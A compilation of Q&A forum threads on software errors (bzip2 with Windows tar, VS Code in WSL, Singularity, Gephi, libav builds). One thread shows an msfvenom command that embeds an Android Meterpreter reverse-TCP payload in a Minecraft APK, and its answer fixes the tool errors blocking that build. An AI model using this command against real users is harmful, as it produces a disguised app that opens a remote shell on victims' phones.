tar: Error opening archive: Can't initialize filter; unable to run program "bzip2 -d" - bzip2

I'm trying to run this code from : https://github.com/pnnl/safekit ,using cmd on windows 10, I already installed python.
when I type the command:
tar -xjvf data_examples.tar.bz2
I keep getting the error:
tar: Error opening archive: Can't initialize filter; unable to run
program "bzip2 -d"
I have tried to download bzip2 through easy-7 zip and GnuWin32 , but it didn't work.
Can any one help me?
P.S.: I did search for the same problem before posting mine.

If you run the command in git bash instead of cmd it should work.

I've run into the same problem! My non-elegant solution so far has been to force Windows's tar.exe to use the bzip2.exe provided with my Windows Git installation. The trick is to add to your user PATH the directory where bzip2.exe is located, in my case:
C:\Program Files\Git\mingw64\bin
So, right now my PATH looks like:
Path=%USERPROFILE%\AppData\Local\Microsoft\WindowsApps;C:\Program Files\Git\mingw64\bin
Notice that I've only touched the user environment PATH, not the system PATH, and I've appended the new directory. As always, touching your PATH can be a little bit dangerous, proceed with care. If someone has a better solution, I'd be glad to hear it.
Note: I tried copying the bzip2.exe to a separate directory, but this didn't work (I presume because bzip2.exe couldn't find some dependencies).


WSL can't detect VS code

At first, I tried to fix my problem of npm instruction
so I added
appendWindowsPath = false
to /etc/wsl.conf
It works, but another problem happen.
When I type code .
Command 'code' not found, did you mean:
command 'node' from deb nodejs (12.22.9~dfsg-1ubuntu3)
command 'cdde' from deb cdde (0.3.1-1build1)
command 'ode' from deb plotutils (2.6-11)
command 'tcode' from deb emboss (6.6.0+dfsg-11ubuntu1)
command 'cde' from deb cde (0.1+git9-g551e54d-1.2)
Try: sudo apt install <deb name>
The above Error message appear.
I tried the following instruction
export PATH=$PATH:"/mnt/c/Users/%USERNAME%/AppData/Local/Programs/Microsoft VS Code/bin"
It also works properly.
Whenever I restarted WSL, npm instruction still worked well, but code instruction lost its function again.
What should I do to fix the problem?
Thanks in advance!
My main suggestion would be to not use appendWindowsPath = false to fix your NPM problem. That's like using a sledgehammer as a flyswatter. As I said in this answer:
Please do not follow the recommendations (like this answer) to completely remove all Windows paths from WSL, as that will severely limit your ability to run Windows applications in WSL (one of its great features).
You'll also lose access to the ability to run PowerShell scripts and commands in WSL easily. You won't have direct access to wsl.exe itself from inside WSL (which comes in handy).
You can type the full paths to these commands, of course, but most instructions and other answers you find here are going to assume that you've left the Windows path intact.
Instead, figure out where npm is installed in your WSL distribution and then determine why it is further toward the end of the PATH than your Windows directories. Windows paths are added at the end of the Linux PATH for a reason. If something in your startup files is adding to the path, it should put it at the beginning, so it has precedence. E.g.:
export PATH="newdir:$PATH"
Note that I'm not saying that you should change your export statement above since, as mentioned, that Windows path would normally come at the end anyway. It's really not going to matter unless you put another code executable somewhere else in your path.
Whenever I restarted WSL, npm instruction still worked well, but code instruction lost its function again.
If you do want the "quick and dirty" (not recommended) solution, then you can simply add that export command that "makes it work" to your ~/.bashrc. That file is processed each time the Bash shell starts interactively.

Singularity: failed to resolve session directory

I wrote a Singularity container that works just fine on my computer. However, when a colleague of mine tries to run it, he gets the error output
FATAL: container creation failed: failed to resolve session directory /usr/local/var/singularity/mnt/session: lstat /usr/local/var: no such file or directory
In the past, he could run containers I build. In fact, he used being able to run a container with the same recipe. The change was that the version of Singularity on the machine I use to build it was upgraded.
I entered the error in a search engine, and I only found a single hit, https://forum.image.sc/t/improving-cluster-supercomputer-performance-tesla-v100-volta-16-32gb-gpu/37459/8, in which this is not resolved.
Does anybody know a way to fix this? Or what the source of the problem is? Or a workaround, preferably one that does not require me to downgrade Singularity? (The machine on which I build it is shared between several users, that's why I don't want to do that.)
Okay, this was somewhat trivial to solve, we just had the colleague create the required folder,
mkdir -p /usr/local/var/singularity/mnt/{container,final,overlay,session}

Malformed String Number Version 2.4.0 when msfvenom -x

Read all and carefully
Hi, I'm using Kali 2.0 and I love to tweak with it (Sorry for bad english but I'm italian). When I use this command:
msfvenom -x minecraft.apk -p android/meterpreter/reverse_tcp LHOST=IP_ADDRESS LPORT=4444 -o mc.apk
it gives me:
Using APK template: minecraft.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.4.0
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I've searched for weeks on all the forums but, I didn't found the solution. I've reinstalled Kali, metasploit-framework, jdk, apktool. Nothing was happened. Any fix?
I have struggled and got the solution. It looks like the problem was with the apktool and also the java environment variables (but in your case it could be only one issue), i uninstalled the apktool & java's(jdk,jre), reinstalled, changed versions through terminal but nothing worked.
To figure this out i read an issue on github https://github.com/iBotPeaches/Apktool/issues/2325
To temporarily fix it, run the following commands in the same terminal window where you are trying to use msfvenom:
alias='java "$_SILENT_JAVA_OPTIONS"'
To permanently fix it, place the above commands in /root/.bashrc(you have to check Show hidden files in View tab).
Now the above error message should go away, and if there is an issue with your apktool it will be displaying unable to rebuild apk with apktool. So, to figure this out read below:
SECOND ISSUE (Apktool)(unable to rebuild apk with apktool):
I have found that there is a missing file
of apktool located in usr/local/sbin. Delete apktool file from there if exists.
Download linux wrapper script https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
Download latest apktool from https://bitbucket.org/iBotPeaches/apktool/downloads and rename it to apktool.jar
Now copy both the files (linux wrapper script & apktool.jar) to /user/local/bin
Type apktool in terminal and verify the version
P.S. For those who cant go with the steps for the second issue, go watch this fix https://youtu.be/vxs_fkUHnSw

Unable to open a saved Gephi project file

Recently I worked on a project done in the network visualization and analysis software Gephi, and I saved it with the ".gephi" extension. However, when I try to reopen the file, it gives the following error message:-
"The project file couldn't be opened. Please check the file has .gephi extension.
XMLStreamException - ParseError at [row,col]:[1,1]
Message: Premature end of file."
I'm a beginner in Gephi and only an amateur programmer. I do not understand this error message, and thus have no ideas on how to resolve it. I tried updating Gephi to the latest version. I also tried to open the file from within Gephi. Neither of those steps have resolved the problem. Can anyone help me out with this, please?
The error message "premature end of file" means that the xml file was not complete. I suppose that the whole file is empty or just the xml part of the file. so maybe the file got corrupted while saving.
Can you try to open the file with notepad or a hexeditor to verify that it has some content?
There must be some bug on the gephi files writing or reading process.
In order to identify the problem it would help if you can post a gephi log file when each error happens.
You can find the log file on gephi user directory (check http://wiki.gephi.org/index.php/Troubleshooting)
For example in Windows 7 the path is C:\Users\Your_User\AppData\Roaming.gephi\dev\var\log\messages.log
Also, if you can share the files, it will be easier to fix.
This could be related to an open bug where Java6 is used to save the gephi file and then Java7 is used to load the file, say on a different machine.
The jdk used by Gephi can be specified in /etc/gephi.conf or alternatively it can be specified as a parameter --jdkhome when launching Gephi.
The problem is with java and javac:
If you created your gephi file with open java-6-openjdk (for example) and then you sitch your java to java-7-openjdk, then this problem surges.
I fix my gephi returning to the same java and javac executables in Linux by:
(In terminal)
sudo update-alternatives --config java
and then
(In terminal)
sudo update-alternatives --config javac
Hope this can help!

Get Error while building libav on windows using minGW and MSYS

I have a trouble with libav.
I used MinGW and MSYS to build libav on windows. However, When I use "make", after some file(.o file) were build i get error,
It is
$ make
AR libavcodec/libavcodec.a C:\msys\mingw\bin\ar.exe: libavcodec/: Permission denied
make: *** [libavcodec/libavcodec.a] Error 1
After that, I view the permission of libavcodec folder, I have all permission. :|
Please help me solve this trouble or give me a full instruction to build libav on windows (I use win7 x64 and have msys, mingw)
I'm not sure if this is relevant, but I had the same error when trying to make ffmpeg. Initially I was getting a missing separator error (in one of the makefiles) when I used configure. I found a page that suggested checking that git was using unix line endings rather than windows (CR LF). So I used
git config --global core.autocrlf false
to set git to use unix line endings and then thought I'd updated my source (being new to git, it turned out I hadn't). I still got the missing separator error, so I added a tab to the start of the line and configure completed. I then used make and would get the same error you're getting. I saw in some of the other makefiles that they still had windows line endings, so I deleted the entire directory apart from the .git folder as mentioned here, and then used
git reset --hard
to get the files again. After this configure and make worked without error, so my guess would be that you're using windows line endings or there's something wrong with the makefiles.